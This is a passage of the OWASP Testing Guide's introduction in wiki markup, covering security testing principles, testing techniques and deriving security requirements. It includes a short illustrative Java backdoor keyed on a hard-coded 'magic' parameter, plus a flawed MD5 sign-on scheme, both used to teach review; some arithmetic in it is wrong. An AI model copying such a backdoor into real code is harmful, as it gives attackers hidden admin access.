As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being used and that it is effective and accurate.&lt;br /&gt;
&lt;br /&gt;
==Principles of Testing==&lt;br /&gt;
&lt;br /&gt;
There are some common misconceptions when developing a testing methodology to weed out security bugs in software. This chapter covers some of the basic principles that should be taken into account by professionals when testing for security bugs in software. &lt;br /&gt;
&lt;br /&gt;
'''There is No Silver Bullet'''&amp;lt;br&amp;gt;&lt;br /&gt;
While it is tempting to think that a security scanner or application firewall will either provide a multitude of defenses or identify a multitude of problems, in reality there are no silver bullets to the problem of insecure software. Application security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective at in-depth assessments and at providing adequate test coverage. Remember that security is a process, not a product. &lt;br /&gt;
&lt;br /&gt;
'''Think Strategically, Not Tactically'''&amp;lt;br&amp;gt;&lt;br /&gt;
Over the last few years, security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in information security during the 1990’s. The patch-and-penetrate model involves fixing a reported bug, but without proper investigation of the root cause. This model is usually associated with the window of vulnerability shown in the figure below. The evolution of vulnerabilities in common software used worldwide has shown the ineffectiveness of this model. Fore more information about the window of vulnerability please refer to [6]. Vulnerability studies [7] have shown that with the reaction time of attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the time between a vulnerability being uncovered and an automated attack against it being developed and released is decreasing every year. There are also several wrong assumptions in the patch-and-penetrate model: patches interfere with the normal operations and might break existing applications, and not all the users might (in the end) be aware of a patch’s availability. Consequently not all the product's users will apply patches, either because of this issue or because they lack knowledge about the patch's existence.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:WindowExposure.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 2: Window of Vulnerability''&amp;lt;/center&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
To prevent reoccurring security problems within an application, it is essential to build security into the Software Development Life Cycle (SDLC) by developing standards, policies, and guidelines that fit and work within the development methodology. Threat modeling and other techniques should be used to help assign appropriate resources to those parts of a system that are most at risk. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The SDLC is King'''&amp;lt;br&amp;gt;&lt;br /&gt;
The SDLC is a process that is well-known to developers. By integrating security into each phase of the SDLC, it allows for a holistic approach to application security that leverages the procedures already in place within the organization. Be aware that while the names of the various phases may change depending on the SDLC model used by an organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define, design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing process, to ensure a cost-effective and comprehensive security program. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Test Early and Test Often'''&amp;lt;br&amp;gt;&lt;br /&gt;
When a bug is detected early within the SDLC, it can be addressed more quickly and at a lower cost. A security bug is no different from a functional or performance-based bug in this regard. A key step in making this possible is to educate the development and QA organizations about common security issues and the ways to detect and prevent them. Although new libraries, tools, or languages might help design better programs (with fewer security bugs), new threats arise constantly and developers must be aware of those that affect the software they are developing. Education in security testing also helps developers acquire the appropriate mindset to test an application from an attacker's perspective. This allows each organization to consider security issues as part of their existing responsibilities.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Scope of Security'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is important to know how much security a given project will require. The information and assets that are to be protected should be given a classification that states how they are to be handled (e.g., Confidential, Secret, Top Secret). Discussions should occur with legal council to ensure that any specific security need will be met. In the USA they might come from federal regulations, such as the Gramm-Leach-Bliley Act [8], or from state laws, such as the California SB-1386 [9]. For organizations based in EU countries, both country-specific regulation and EU Directives might apply. For example, Directive 96/46/EC4 [10] makes it mandatory to treat personal data in applications with due care, whatever the application. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop the Right Mindset'''&amp;lt;br&amp;gt;&lt;br /&gt;
Successfully testing an application for security vulnerabilities requires thinking &amp;quot;outside of the box.&amp;quot; Normal use cases will test the normal behavior of the application when a user is using it in the manner that you expect. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find what assumptions made by web developers are not always true and how they can be subverted. This is one of the reasons why automated tools are actually bad at automatically testing for vulnerabilities: this creative thinking must be done on a case-by-case basis and most web applications are being developed in a unique way (even if using common frameworks). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Subject'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the first major initiatives in any good security program should be to require accurate documentation of the application. The architecture, data-flow diagrams, use cases, and more should be written in formal documents and made available for review. The technical specification and application documents should include information that lists not only the desired use cases, but also any specifically disallowed use case. Finally, it is good to have at least a basic security infrastructure that allows the monitoring and trending of attacks against an organization's applications and network (e.g., IDS systems). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use the Right Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security program. There is a range of open source and commercial tools that can automate many routine security tasks. These tools can simplify and speed up the security process by assisting security personnel in their tasks. It is important to understand exactly what these tools can and cannot do, however, so that they are not oversold or used incorrectly. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The Devil is in the Details'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is critical not to perform a superficial security review of an application and consider it complete. This will instill a false sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to carefully review the findings and weed out any false positive that may remain in the report. Reporting an incorrect security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify that every possible section of application logic has been tested, and that every use case scenario was explored for possible vulnerabilities. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use Source Code When Available'''&amp;lt;br&amp;gt;&lt;br /&gt;
While black box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed in production, they are not the most effective way to secure an application. If the source code for the application is available, it should be given to the security staff to assist them while performing their review. It is possible to discover vulnerabilities within the application source that would be missed during a black box engagement. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop Metrics'''&amp;lt;br&amp;gt;&lt;br /&gt;
An important part of a good security program is the ability to determine if things are getting better. It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization. These metrics can show if more education and training are required, if there is a particular security mechanism that is not clearly understood by development, and if the total number of security related problems being found each month is going down. Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations might be a good head start.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Document the Test Results'''&amp;lt;br&amp;gt;&lt;br /&gt;
To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they ware performed, and details of the test findings. It is wise to agree on an acceptable format for the report which is useful to all concerned parties, which may include developers, project management, business owners, IT department, audit, and compliance. The report must be clear to the business owner in identifying where material risks exist and sufficient to get their backing for subsequent mitigation actions. The report must be clear to the developer in pin-pointing the exact function that is affected by the vulnerability, with associated recommendations for resolution in a language that the developer will understand (no pun intended). Last but not least, the report writing should not be overly burdensome on the security tester themselves; security testers are not generally renowned for their creative writing skills, therefore agreeing on a complex report can lead to instances where test results do not get properly documented.&lt;br /&gt;
&lt;br /&gt;
==Testing Techniques Explained==&lt;br /&gt;
&lt;br /&gt;
This section presents a high-level overview of various testing techniques that can be employed when building a testing program. It does not present specific methodologies for these techniques, although Chapter 3 will address this information. This section is included to provide context for the framework presented in the next hapter and to highlight the advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover:&lt;br /&gt;
* Manual Inspections &amp;amp; Reviews &lt;br /&gt;
* Threat Modeling &lt;br /&gt;
* Code Review &lt;br /&gt;
* Penetration Testing &lt;br /&gt;
&lt;br /&gt;
=== Manual Inspections &amp;amp; Reviews ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Manual inspections are human-driven reviews that typically test the security implications of the people, policies, and processes, but can include inspection of technology decisions such as architectural designs. They are usually conducted by analyzing documentation or performing interviews with the designers or system owners. While the concept of manual inspections and human reviews is simple, they can be among the most powerful and effective techniques available. By asking someone how something works and why it was implemented in a specific way, it allows the tester to quickly determine if any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place. As with many things in life, when conducting manual inspections and reviews we suggest you adopt a trust-but-verify model. Not everything everyone tells you or shows you will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application. Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections.&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Requires no supporting technology &lt;br /&gt;
* Can be applied to a variety of situations&lt;br /&gt;
* Flexible &lt;br /&gt;
* Promotes teamwork &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Can be time consuming &lt;br /&gt;
* Supporting material not always available &lt;br /&gt;
* Requires significant human thought and skill to be effective!&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Threat modeling has become a popular technique to help system designers think about the security threats that their systems/applications might face. Therefore, threat modeling can be seen as risk assessment for applications. In fact, it enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses. To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 [11] standard for risk assessment. This approach involves: &lt;br /&gt;
* Decomposing the application – understand, through a process of manual inspection, how the application works, its assets, functionality, and connectivity. &lt;br /&gt;
* Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them according to business importance. &lt;br /&gt;
* Exploring potential vulnerabilities - whether technical, operational, or management. &lt;br /&gt;
* Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective, by using threat scenarios or attack trees.&lt;br /&gt;
* Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic. The output from a threat model itself can vary but is typically a collection of lists and diagrams. The OWASP Code Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for the testing applications for potential security flaws in the design of the application. There is no right or wrong way to develop threat models and perform information risk assessments on applications. [12]. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Practical attacker's view of the system &lt;br /&gt;
* Flexible &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages: &amp;lt;br&amp;gt;'''&lt;br /&gt;
* Relatively new technique &lt;br /&gt;
* Good threat models don’t automatically mean good software&lt;br /&gt;
&lt;br /&gt;
=== Source Code Review ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Source code review is the process of manually checking a web application's source code for security issues. Many serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying goes “if you want to know what’s really going on, go straight to the source.&amp;quot; Almost all security experts agree that there is no substitute for actually looking at the code. All the information for identifying security problems is there in the code somewhere. Unlike testing third party closed software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes. Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing, making source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guess work of black box testing. Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient to find implementation issues such as places where input validation was not performed or when fail open control procedures may be present. But keep in mind that operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one being analyzed herein [13].&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Completeness and effectiveness &lt;br /&gt;
* Accuracy &lt;br /&gt;
* Fast (for competent reviewers) &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Requires highly skilled security developers &lt;br /&gt;
* Can miss issues in compiled libraries &lt;br /&gt;
* Cannot detect run-time errors easily &lt;br /&gt;
* The source code actually deployed might differ from the one being analyzed&lt;br /&gt;
&lt;br /&gt;
'''For more on code review, checkout the [[OWASP Code Review Project|OWASP code review project]]'''.&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Penetration Testing ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Penetration testing has been a common technique used to test network security for many years. It is also commonly known as black box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application remotely, without knowing the inner workings of the application itself, to find security vulnerabilities. Typically, the penetration test team would have access to an application as if they were users. The tester acts like an attacker and attempts to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system. While penetration testing has proven to be effective in network security, the technique does not naturally translate to applications. When penetration testing is performed on networks and operating systems, the majority of the work is involved in finding and then exploiting known vulnerabilities in specific technologies. As web applications are almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Penetration testing tools have been developed that automate the process, but, again, with the nature of web applications their effectiveness is usually poor. Many people today use web application penetration testing as their primary security testing technique. Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. Gary McGraw in [14] summed up penetration testing well when he said, “If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don’t have a very bad problem”. However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Can be fast (and therefore cheap) &lt;br /&gt;
* Requires a relatively lower skill-set than source code review &lt;br /&gt;
* Tests the code that is actually being exposed &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Too late in the SDLC &lt;br /&gt;
* Front impact testing only!&lt;br /&gt;
&lt;br /&gt;
=== The Need for a Balanced Approach ===&lt;br /&gt;
With so many techniques and so many approaches to testing the security of web applications, it can be difficult to understand which techniques to use and when to use them.&lt;br /&gt;
Experience shows that there is no right or wrong answer to exactly what techniques should be used to build a testing framework. The fact remains that all techniques should probably be used to ensure that all areas that need to be tested are tested. What is clear, however, is that there is no single technique that effectively covers all security testing that must be performed to ensure that all issues have been addressed. Many companies adopt one approach, which has historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the issues that need to be tested, and is simply “too little too late” in the software development life cycle (SDLC). &lt;br /&gt;
The correct approach is a balanced one that includes several techniques, from manual interviews to technical testing. The balanced approach is sure to cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available depending on the current SDLC phase. &lt;br /&gt;
Of course there are times and circumstances where only one technique is possible; for example, a test on a web application that has already been created, and where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, we encourage the testing parties to challenge assumptions, such as no access to source code, and to explore the possibility of more complete testing. &lt;br /&gt;
A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. However, it is recommended that a balanced testing framework look something like the representations shown in Figure 3 and Figure 4. The following figure shows a typical proportional representation overlaid onto the software development life cycle. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionSDLC.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 3: Proportion of Test Effort in SDLC''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
The following figure shows a typical proportional representation overlaid onto testing techniques. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionTest.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 4: Proportion of Test Effort According to Test Technique''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''A Note about Web Application Scanners'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use automated web application scanners. While they undoubtedly have a place in a testing program, we want to highlight some fundamental issues about why we do not believe that automating black box testing is (or will ever be) effective. By highlighting these issues, we are not discouraging web application scanner use. Rather, we are saying that their limitations should be understood, and testing frameworks should be planned appropriately.&lt;br /&gt;
NB: OWASP is currently working to develop a web application scanner-benchmarking platform. The following examples indicate why automated black box testing is not effective. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 1: Magic Parameters'''&amp;lt;br&amp;gt;&lt;br /&gt;
Imagine a simple web application that accepts a name-value pair of “magic” and then the value. For simplicity, the GET request may be: ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=value&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt; To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and integers 0 – 9. The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now:&amp;lt;br&amp;gt; ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic= sf8g7sfjdsurtsdieerwqredsgnfg8d &amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt;&lt;br /&gt;
Given that all of the other parameters were simple two- and three-characters fields, it is not possible to start guessing combinations at approximately 28 characters. A web application scanner will need to brute force (or guess) the entire key space of 30 characters. That is up to 30^28 permutations, or trillions of HTTP requests! That is an electron in a digital haystack! &lt;br /&gt;
The code for this exemplar Magic Parameter check may look like the following: &amp;lt;br&amp;gt;&lt;br /&gt;
 public void doPost( HttpServletRequest request, HttpServletResponse response) &lt;br /&gt;
 { &lt;br /&gt;
 String magic = “sf8g7sfjdsurtsdieerwqredsgnfg8d”; &lt;br /&gt;
 boolean admin = magic.equals( request.getParameter(“magic”));&lt;br /&gt;
 if (admin) doAdmin( request, response); &lt;br /&gt;
 else …. // normal processing &lt;br /&gt;
 } &lt;br /&gt;
By looking in the code, the vulnerability practically leaps off the page as a potential problem. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 2: Bad Cryptography'''&amp;lt;br&amp;gt;&lt;br /&gt;
Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: ''Hash { username : date }'' &amp;lt;br&amp;gt;&lt;br /&gt;
When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP re-direct. Site B independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be. Clearly, as we explain the scheme, the inadequacies can be worked out, and it can be seen how anyone that figures it out (or is told how it works, or downloads the information from Bugtraq) can login as any user. Manual inspection, such as an interview, would have uncovered this security issue quickly, as would inspection of the code. A black-box web application scanner would have seen a 128-bit hash that changed with each user, and by the nature of hash functions, did not change in any predictable way.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''A Note about Static Source Code Review Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, we want to highlight some fundamental issues about why we do not believe this approach is effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining security issues due to coding errors, however significant manual effort is required to validate the findings. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Requirements Test Derivation==&lt;br /&gt;
If you want to have a successful testing program, you need to know what the objectives of the testing are. These objectives are specified by security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations and positive and negative application requirements. It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks.&lt;br /&gt;
&lt;br /&gt;
'''Testing Objectives'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the objectives of security testing is to validate that security controls function as expected. This is documented via ''security requirements'' that describe the functionality of the security control. At a high level, this means proving confidentiality, integrity, and availability of the data as well as the service.  The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the [[OWASP Top Ten]], as well as vulnerabilities that are previously identified with security assessments during the SDLC, such as threat modeling, source code analysis, and penetration test. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Documentation'''&amp;lt;br&amp;gt;&lt;br /&gt;
The first step in the documentation of security requirements is to understand the ''business requirements''. A business requirement document could provide the initial, high-level information of the expected functionality for the application. For example, the main purpose of an application may be to provide financial services to customers or shopping and purchasing goods from an on-line catalogue. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies.&lt;br /&gt;
&lt;br /&gt;
A general checklist of the applicable regulations, standards, and policies serves well the purpose of a preliminary security compliance analysis for web applications. For example, compliance regulations can be identified by checking information about the business sector and the country/state where the application needs to function/operate. Some of these compliance guidelines and regulations might translate in specific technical requirements for security controls. For example, in the case of financial applications, the compliance with FFIEC guidelines for authentication [15] requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security control and multi factor authentication. &lt;br /&gt;
&lt;br /&gt;
Applicable industry standards for security need also to be captured by the general security requirement checklist. For example, in the case of applications that handle customer credit card data, the compliance with the PCI DSS [16] standard forbids the storage of PINs and CVV2 data and requires that the merchant protect magnetic strip data in storage and transmission with encryption and on display by masking. Such PCI DSS security requirements could be validated via source code analysis.&lt;br /&gt;
&lt;br /&gt;
Another section of the checklist needs to enforce general requirements for compliance with the organization information security standards and policies. From the functional requirements perspective, requirements for the security control need to map to a specific section of the information security standards. An example of such requirement can be: &amp;quot;a password complexity of six alphanumeric characters must be enforced by the authentication controls used by the application.&amp;quot; When security requirements map to compliance rules a security test can validate the exposure of compliance risks. If violation with information security standards and policies are found, these will result in a risk that can be documented and that the business has to deal with (i.e., manage). For this reason, since these security compliance requirements are enforceable, they need to be well documented and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Validation'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the functionality perspective, the validation of security requirements is the main objective of security testing, while, from the risk management perspective, this is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as lack of basic authentication, authorization, or encryption controls. More in depth, the security assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personal identifiable information (PII) and sensitive data, the security requirement to be validated is the compliance with the company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization encryption standards. These might require that only certain algorithms and key lengths could be used. For example, a security requirement that can be security tested is verifying that only allowed ciphers are used (e.g., SHA-1, RSA, 3DES) with allowed minimum key lengths (e.g., more than 128 bit for symmetric and more than 1024 for asymmetric encryption).&lt;br /&gt;
&lt;br /&gt;
From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies. For example, threat modeling focuses on identifying security flaws during design, secure code analysis and reviews focus on identifying security issues in source code during development, and penetration testing focuses on identifying vulnerabilities in the application during testing/validation. &lt;br /&gt;
&lt;br /&gt;
Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from the un-exploitable ones is possible when the results of penetration tests and source code analysis are combined.  Considering the security test for a SQL injection vulnerability, for example, a black box test might involve first a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. A further validation of the SQL vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis till the malicious query is executed. Assuming the tester has the source code, she might learn from the source code analysis on how to construct the SQL attack vector that can exploit the vulnerability (e.g., execute a malicious query returning confidential data to unauthorized user).&lt;br /&gt;
&lt;br /&gt;
'''Threats and Countermeasures Taxonomies'''&amp;lt;br&amp;gt;&lt;br /&gt;
A ''threat and countermeasure classification'' that takes into consideration root causes of vulnerabilities is the critical factor to verify that security controls are designed, coded, and built so that the impact due to the exposure of such vulnerabilities is mitigated. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point to derive general security requirements. More specifically, the web application security frame [17] provides a classification (e.g. taxonomy) of vulnerabilities that can be documented in different guidelines and standards and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root cause of the vulnerability. A threat can be categorized by using STRIDE [18], for example, as Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of non-repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests.&lt;br /&gt;
&lt;br /&gt;
A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding such as secure coding standards. An example of a common coding error in authentication controls consists of applying an hash function to encrypt a password, without applying a seed to the value. From the secure coding perspective, this is a vulnerability that affects the encryption used for authentication with a vulnerability root cause in a coding error. Since the root cause is insecure coding the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC.&lt;br /&gt;
&lt;br /&gt;
'''Security Testing and Risk Analysis'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security requirements need to take into consideration the severity of the vulnerabilities to support a ''risk mitigation strategy''. Assuming that the organization maintains a repository of vulnerabilities found in applications, i.e., a vulnerability knowledge base, the security issues can be reported by type, issue, mitigation, root cause, and mapped to the applications where they are found.  Such a vulnerability knowledge base can also be used to establish a metrics to analyze the effectiveness of the security tests throughout the SDLC.&lt;br /&gt;
 &lt;br /&gt;
For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and input validation vulnerability type. The exposure of such vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before hitting the database and mitigate the vulnerability. By combining the results of source code analysis and penetration testing it is possible to determine the likelihood and exposure of the vulnerability and calculate the risk rating of the vulnerability. By reporting vulnerability risk ratings in the findings (e.g., test report) it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk can be fixed in further releases.&lt;br /&gt;
&lt;br /&gt;
By considering the threat scenarios exploiting common vulnerabilities it is possible to identify potential risks for which the application security control needs to be security tested. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identify theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization vulnerability knowledge base can be used to derive security risk driven tests cases to validate the most likely attack scenarios. For example if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls.&lt;br /&gt;
&lt;br /&gt;
===Functional and Non Functional Test Requirements===&lt;br /&gt;
'''Functional Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the perspective of functional security requirements, the applicable standards, policies and regulations drive both the need of a type of security control as well as the control functionality. These requirements are also referred to as “positive requirements”, since they state the expected functionality that can be validated through security tests.&lt;br /&gt;
Examples of positive requirements are: “the application will lockout the user after six failed logon attempts” or “passwords need to be six min characters, alphanumeric”. The validation of positive requirements consists of asserting the expected functionality and, as such, can be tested by re-creating the testing conditions, and by running the test according to predefined inputs and by asserting the expected outcome as a fail/pass condition.&lt;br /&gt;
&lt;br /&gt;
In order to validate security requirements with security tests, security requirements need to be function driven and highlight the expected functionality (the what) and implicitly the implementation (the how). Examples of high-level security design requirements for authentication can be:&lt;br /&gt;
*Protect user credentials and shared secrets in transit and in storage&lt;br /&gt;
*Mask any confidential data in display (e.g., passwords, accounts)&lt;br /&gt;
*Lock the user account after a certain number of failed login attempts &lt;br /&gt;
*Do not show specific validation errors to the user as a result of failed logon &lt;br /&gt;
*Only allow passwords that are alphanumeric, include special characters and six characters minimum length, to limit the attack surface&lt;br /&gt;
*Allow for password change functionality only to authenticated users by validating the old password, the new password, and the user answer to the challenge question, to prevent brute forcing of a password via password change.&lt;br /&gt;
*The password reset form should validate the user’s username and the user’s registered email before sending the temporary password to the user via email. The temporary password issued should be a one time password. A link to the password reset web page will be sent to the user. The password reset web page should validate the user temporary password, the new password, as well as the user answer to the challenge question.&lt;br /&gt;
&lt;br /&gt;
'''Risk Driven Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security tests need also to be risk driven, that is they need to validate the application for unexpected behavior. These are also called “negative requirements”, since they specify what the application should not do. &lt;br /&gt;
Examples of &amp;quot;should not do&amp;quot; (negative) requirements are:&lt;br /&gt;
* The application should not allow for the data to be altered or destroyed&lt;br /&gt;
* The application should not be compromised or misused for unauthorized financial transactions by a malicious user.&lt;br /&gt;
&lt;br /&gt;
Negative requirements are more difficult to test, because there is no expected behavior to look for. This might require a threat analyst to come up with unforeseeable input conditions, causes, and effects. This is where security testing needs to be driven by risk analysis and threat modeling.&lt;br /&gt;
The key is to document the threat scenarios and the functionality of the countermeasure as a factor to mitigate a threat. For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasure perspective:&lt;br /&gt;
